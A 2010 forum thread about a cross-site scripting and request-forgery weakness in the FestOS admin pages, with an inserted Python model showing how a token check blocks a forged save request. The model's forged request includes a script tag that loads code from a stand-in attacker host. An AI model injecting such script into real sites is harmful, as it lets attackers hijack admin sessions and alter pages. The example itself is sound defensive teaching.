Author Message
 Post subject: Potential XSS vulnerability - low risk
PostPosted: Tue Jul 06, 2010 11:45 am 
Site Admin

Joined: Fri Feb 13, 2009 5:26 pm
Posts: 44
Location: Walworth, NY
A "white hat" hacking group has informed me that two of the admin pages are potentially vulnerable to XSS injection. These would be the two PHP scripts that save the pages you add and those you edit. While not identified, the two related snippets processor pages would also be vulnerable.

Their claim is that a user could inject XSS or other malicious code via these processor pages. However, all of the affected pages require you to be logged in as an administrator -- all are set to redirect you if you're not logged in.

Thus, to exploit this "vulnerability" you must be logged in as the site admin. In my mind, this makes the vulnerability nothing to lose sleep over. In my tests, you can't submit data to the form if you're not logged in. Furthermore, filtering the data you input would limit the current flexibility of the system -- other than the restrictions imposed by TinyMCE, you can input anything into the page/snippets so that you can add to your site as you see fit.

I'm not sure how or if I'll handle this in a future release. I sincerely appreciate the testing provided by this white-hat group. They have said they will publish their findings in a few days.

Tim

PS: I added this as an issue at the Google Code site.


 Post subject: Re: Potential XSS vulnerability - low risk
PostPosted: Wed Jul 21, 2010 2:23 pm 
Site Admin
As noted previously, the affected administration pages require the user to be logged on with sufficient permissions. A malicious user cannot simply load the form processing page and use it to insert data. They must be logged on as an admin or the page will halt.

Thus the real risk arises when FestOS administrators do not log out before visiting other web sites. In such a situation, code at those sites could capitalize on the lingering logged-on state, craft a special request to your FestOS site, and modify data (update a web page, add an administrator, etc.).

Until a fix is published, you can easily eliminate this vulnerability by logging out before leaving the site. (Also, don't visit another site in another browser tab or window while remaining logged on to the FestOS admin system.)
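The attack described in the post above (a hostile page using the admin's still-valid login to push a forged save request at the site) is a cross-site request forgery. The model below is an added example, not FestOS code and not the patch Tim later posted: it mimics a page-save handler that checks only for an admin session, next to one that additionally requires a per-session token that a foreign page cannot know, and runs a constructed forged request and a constructed legitimate request through both. The handler names, the request shape, the session store, the cookie name and the site origin are all assumptions made for the example.

```python
"""Model of the CSRF scenario from the post: the admin's browser attaches the
session cookie to any request aimed at the site, including one an attacker's
page triggers, so a handler that checks only "is this an admin session?"
accepts the forged write. Hypothetical names throughout; not FestOS code."""
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional

# Constructed server-side session store: session id -> session data.
# A real deployment would keep this in PHP's session storage.
SESSIONS = {
    "sess-admin-1": {"user": "admin", "role": "admin",
                     "csrf_token": secrets.token_hex(32)},
}

@dataclass
class Request:
    cookies: dict
    form: dict
    origin: Optional[str] = None   # Origin header, sent by modern browsers on POST

def current_session(req):
    """Return the session record for the request's cookie, or None."""
    return SESSIONS.get(req.cookies.get("PHPSESSID"))

def save_page_vulnerable(req, pages):
    """Admin check only: the pattern the thread describes. Logging out works as a
    stop-gap because the cookie then no longer maps to a session."""
    sess = current_session(req)
    if sess is None or sess["role"] != "admin":
        return "redirect:login"
    pages[req.form["id"]] = req.form["content"]
    return "saved"

def save_page_hardened(req, pages, site_origin="https://festos.example"):
    """Admin check plus a synchroniser token plus an Origin check (assumed fix,
    not the project's actual patch)."""
    sess = current_session(req)
    if sess is None or sess["role"] != "admin":
        return "redirect:login"
    # The token lives in the admin's session and is only emitted into the site's
    # own edit form, so a page on another origin cannot read or guess it.
    # compare_digest keeps the comparison constant-time.
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, sess["csrf_token"]):
        return "forbidden:bad-csrf-token"
    # Defence in depth: a browser that reports a foreign Origin is refused even
    # if the token somehow leaked.
    if req.origin is not None and req.origin != site_origin:
        return "forbidden:cross-origin"
    pages[req.form["id"]] = req.form["content"]
    return "saved"

def render_edit_form(req):
    """What the site's own edit page would embed as a hidden form field."""
    sess = current_session(req)
    return {"csrf_token": sess["csrf_token"]} if sess else {}

def forged_request():
    """Constructed: what an auto-submitting form on an attacker's page produces
    while the admin is still logged in. The browser adds the cookie; the
    attacker chose the fields but cannot supply the session's token."""
    return Request(cookies={"PHPSESSID": "sess-admin-1"},
                   form={"id": "home",
                         "content": "<script src='//attacker.example/x.js'></script>"},
                   origin="https://attacker.example")

def legitimate_request():
    """Constructed: the admin submitting the site's own edit form."""
    admin_cookies = {"PHPSESSID": "sess-admin-1"}
    hidden = render_edit_form(Request(cookies=admin_cookies, form={}))
    return Request(cookies=admin_cookies,
                   form={"id": "home", "content": "<p>Welcome</p>", **hidden},
                   origin="https://festos.example")

def demo():
    """Run both requests through both handlers and report the outcomes."""
    pages_v, pages_h = {}, {}
    results = {
        "vulnerable_forged": save_page_vulnerable(forged_request(), pages_v),
        "hardened_forged": save_page_hardened(forged_request(), pages_h),
        "hardened_legit": save_page_hardened(legitimate_request(), pages_h),
        "vulnerable_page_after": pages_v.get("home"),
        "hardened_page_after": pages_h.get("home"),
    }
    return results

if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The vulnerable handler saves the attacker's content because the session check passes; the hardened one rejects the same request on the missing token and still accepts the admin's own submission. Note that this is why the thread's "you must be logged in" argument does not settle the matter: the forged request is made by a logged-in browser, just not on the admin's instruction.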


 Post subject: Re: Potential XSS vulnerability - low risk
PostPosted: Sun Jul 25, 2010 9:43 am 
Site Admin
I've posted a patch for the XSS vulnerability. You can grab it from the Google Code site: http://code.google.com/p/festos/downloads/list You *must* merge the contents of the "ADD 2 YOUR config.php FILE.txt" file with your config.php file (core directory). The rest, just upload over the old files.

Tim

